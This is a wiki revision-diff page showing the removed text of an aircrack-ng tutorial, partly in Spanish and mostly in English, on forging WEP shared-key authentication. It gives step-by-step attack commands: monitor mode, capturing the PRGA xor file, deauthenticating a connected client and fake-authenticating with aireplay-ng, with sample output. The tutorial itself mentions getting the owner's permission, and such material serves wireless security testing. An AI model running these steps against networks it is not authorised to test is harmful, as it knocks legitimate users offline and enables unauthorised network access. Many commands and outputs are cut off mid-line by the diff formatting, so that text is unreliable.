spanish_shared_key
Differences
This shows you the differences between two versions of the page.
Next revision | Previous revision | ||
spanish_shared_key [2007/02/25 16:48] – created spanish | spanish_shared_key [2009/08/14 18:21] (current) – --- mister_x | ||
---|---|---|---|
Line 1: | Line 1: | ||
- | ====== Tutorial: Como hacer una autenticación falsa con clave compartida (shared key) ====== | ||
- | Version: 1.01 Febrero 15, 2007 (Cambios al final del texto) \\ | ||
- | By: darkAudax | ||
- | |||
- | ===== Introducción ===== | ||
- | |||
- | Este tutorial sirve para la situación en la que recibes el siguiente mensaje de error cuando intentas realizar una [[fake_authentication|falsa autenticación]] con [[aireplay-ng]]: | ||
- | |||
- | | ||
- | | ||
- | | ||
- | |||
- | El tutorial se basará en la autenticación WEP por lo que es necesario entender lo que estamos haciendo. | ||
- | |||
- | Es recomendable que experimentes con tu propio punto de acceso para familiarizarte con estas ideas y técniceas. Si no es de tu propiedad, recuerda que debes pedir permiso al dueño del punto de acceso con el que quieras practicar o jugat. | ||
- | |||
- | Antes de nada quiero darle las gracias al [[http:// | ||
- | |||
- | Por favor, enviame cualquier duda o sugerencia, positiva o negativa. Los problemas que encuentres, ideas o trucos serán bienvenidos. | ||
- | |||
- | |||
- | ===== Puntos de partida ===== | ||
- | |||
- | Esta solución presupone que: | ||
- | * Estas usando drivers parcheados para soportar inyección. Puedes snifar paquetes con [[http:// | ||
- | * You are physically close enough to send and receive access point packets. | ||
- | * You are using v0.7 of aircrack-ng. If you use a different version then some of the command options may have to be changed. | ||
- | |||
- | Ensure all of the above assumptions are true, otherwise the advice that follows will not work. In the examples below, you will need to change " | ||
- | |||
- | ===== Equipment used ===== | ||
- | |||
- | In this tutorial, here is what was used: | ||
- | |||
- | *MAC address of PC running aircrack-ng suite: 00: | ||
- | *BSSID (MAC address of access point): 00: | ||
- | *ESSID (Wireless network name): teddy | ||
- | *Access point channel: 9 | ||
- | *Wireless interface: ath0 | ||
- | *MAC address of a client successfully associated with the access point: 00: | ||
- | |||
- | You should gather the equivalent information for the network you will be working on. Then just change the values in the examples below to the specific network. | ||
- | |||
- | ===== Solution ===== | ||
- | |||
- | ==== Solution Background ==== | ||
- | |||
- | An access point must authenticate a station before the station can associate with the access point or communicate with the network. The IEEE 802.11 standard defines two types of WEP authentication: | ||
- | |||
- | * Open System Authentication allows any device to join the network, assuming that the device SSID matches the access point SSID. Alternatively, | ||
- | |||
- | * Shared Key Authentication requires that the station and the access point have the same WEP key to authenticate. | ||
- | |||
- | We will be dealing with the shared key authentication. | ||
- | |||
- | ==== Solution Overview ==== | ||
- | |||
- | In order to do a shared key fake authentication, | ||
- | |||
- | Here are the basic steps we will be going through: | ||
- | |||
- | - Start the wireless interface in monitor mode on the specific AP channel | ||
- | - Start airodump-ng on AP channel with filter for bssid to collect the PRGA xor file | ||
- | - Deauthenticate a connected client | ||
- | - Perform shared key fake authentication | ||
- | |||
- | |||
- | ==== Step 1 - Start the wireless interface in monitor mode on AP channel ==== | ||
- | |||
- | Enter the following command to start the wireless card on channel 9 in monitor mode: | ||
- | |||
- | airmon-ng start wifi0 9 | ||
- | |||
- | Note: In this command we use " | ||
- | |||
- | The system will respond: | ||
- | |||
- | | ||
- | |||
- | | ||
- | | ||
- | |||
- | You will notice that " | ||
- | |||
- | Then enter " | ||
- | |||
- | To confirm the interface is properly setup, enter " | ||
- | |||
- | The system will respond: | ||
- | |||
- | | ||
- | |||
- | | ||
- | |||
- | | ||
- | |||
- | | ||
- | | ||
- | Bit Rate:0 kb/s | ||
- | | ||
- | | ||
- | Power Management: | ||
- | Link Quality=0/ | ||
- | Rx invalid nwid: | ||
- | Tx excessive retries: | ||
- | |||
- | In the response above, you can see that ath0 is in monitor mode, on the 2.452GHz frequency which is channel 9 and the Access Point shows the MAC address of your wireless card. So everything is good. It is important to confirm all this information prior to proceeding, otherwise the following steps will not work properly. | ||
- | |||
- | To match the frequency to the channel, check out: | ||
- | http:// | ||
- | |||
- | === Troubleshooting Tips === | ||
- | |||
- | *If another interface started other then ath0 then you can use that one or use " | ||
- | |||
- | |||
- | ==== Step 2 - Start airodump-ng ==== | ||
- | |||
- | Open another console session to capture the PRGA xor file. Then enter: | ||
- | |||
- | airodump-ng -c 9 --bssid 00: | ||
- | |||
- | Where: | ||
- | *-c 9 is the channel for the wireless network | ||
- | *--bssid 00: | ||
- | *-w sharedkey is file name prefix for the file which will contain the PRGA xor data. | ||
- | *ath0 is the interface name. | ||
- | |||
- | Beyond the error message shown in the introduction, | ||
- | |||
- | CH 9 ][ Elapsed: 20 s ][ 2007-02-10 16:29 | ||
- | |||
- | BSSID PWR RXQ Beacons | ||
- | |||
- | 00: | ||
- | |||
- | BSSID STATION | ||
- | |||
- | 00: | ||
- | |||
- | Once " | ||
- | sharedkey-01-00-14-6C-7E-40-80.xor | ||
- | |||
- | The " | ||
- | |||
- | In real life, you will not likely be that lucky and happen to be sniffing when a wireless client associates with the access point yielding the PRGA xor file. To obtain the PRGA xor bit file, there are two basic methods: | ||
- | |||
- | * The first is to be patient. | ||
- | * The second method is to [[deauthentication|deauthenticate]] a client to force it to associate again. | ||
- | |||
- | |||
- | ==== Step 3 - Deauthenticate a connected client ==== | ||
- | |||
- | This step is only required if you do not have a PRGA xor file. You may also use the PRGA xor file obtained via a [[korek_chopchop|chopchop]] or [[fragmentation]] attack. | ||
- | |||
- | Based on the output of airodump-ng in the previous step, you determine a client which is currently connected. | ||
- | |||
- | aireplay-ng -0 1 -a 00: | ||
- | |||
- | Where: | ||
- | * -0 means deauthentication | ||
- | * 1 is the number of deauths to send (you can send muliple if you wish) | ||
- | * -a 00: | ||
- | * -c 00: | ||
- | *ath0 is the interface name | ||
- | |||
- | Here is what the ouput looks like: | ||
- | |||
- | | ||
- | |||
- | Prior to executing the command above, open another console and start airodump-ng in the same way as you did earlier " | ||
- | |||
- | Once you run the deauthentication command, see if airodump-ng has output the PRGA xor file. If not, try another deauthentication or against another client. | ||
- | |||
- | Once you have successfully obtained the PRGA xor file, proceed to the next step. | ||
- | |||
- | === Troubleshooting Tips === | ||
- | |||
- | * Be sure you are physically close enough to send and receive access point packets. | ||
- | |||
- | ==== Step 4 - Perform Shared Key Fake Authentication ==== | ||
- | |||
- | Now that you have a PRGA xor file, you are ready to do the shared key fake authentication. | ||
- | |||
- | aireplay-ng -1 0 -e teddy -y sharedkey-04-00-14-6C-7E-40-80.xor -a 00: | ||
- | |||
- | Where: | ||
- | * -1 means fake authentication | ||
- | * 0 means only athenticate once | ||
- | * -e teddy is the SSID of the network | ||
- | * -y sharedkey-04-00-14-6C-7E-40-80.xor is the name of file containing the PRGA xor bits | ||
- | * -a 00: | ||
- | * -h 00: | ||
- | * ath0 is the interface name | ||
- | |||
- | Here is an example of a successful authentication: | ||
- | |||
- | | ||
- | | ||
- | | ||
- | Code 0 - Authentication SUCCESSFUL :) | ||
- | | ||
- | Code 0 - Association SUCCESSFUL :) | ||
- | |||
- | If you receive the messages above, you are good to go forward with the standard injection techniques. | ||
- | |||
- | Here is an example of a failed authentication: | ||
- | |||
- | | ||
- | | ||
- | | ||
- | | ||
- | | ||
- | | ||
- | and so on... | ||
- | |||
- | Here another type of failure: | ||
- | |||
- | | ||
- | | ||
- | | ||
- | Code 0 - Authentication SUCCESSFUL :) | ||
- | | ||
- | Not answering...(Step3) | ||
- | | ||
- | | ||
- | Not answering...(Step3) | ||
- | | ||
- | and so on... | ||
- | |||
- | |||
- | === Usage Tip === | ||
- | |||
- | * If you use a PRGA xor file obtained from a chopchop attack, be sure it is at least 144 bytes long. You need a mininum number of bits to successfully do the shared key fake authentication. | ||
- | |||
- | === Troubleshooting Tips === | ||
- | |||
- | * If you received the "Part 1 authentication failure" | ||
- | * Some access points are configured to only allow selected MAC access to associate and connect. | ||
- | * Make sure you are physically close enough to the access point to inject packets. | ||
- | * If you received the " | ||
- | |||
- | |||
- | =====Change Log ===== | ||
- | February 15/2007 v1.01 | ||
- | * Incorporate feedback from cjaghblb | ||
- | |||
- | February 14/2007 v1.00 | ||
- | * Initial Release | ||
- | |||
spanish_shared_key.1172418481.txt.gz · Last modified: 2007/02/25 16:48 by spanish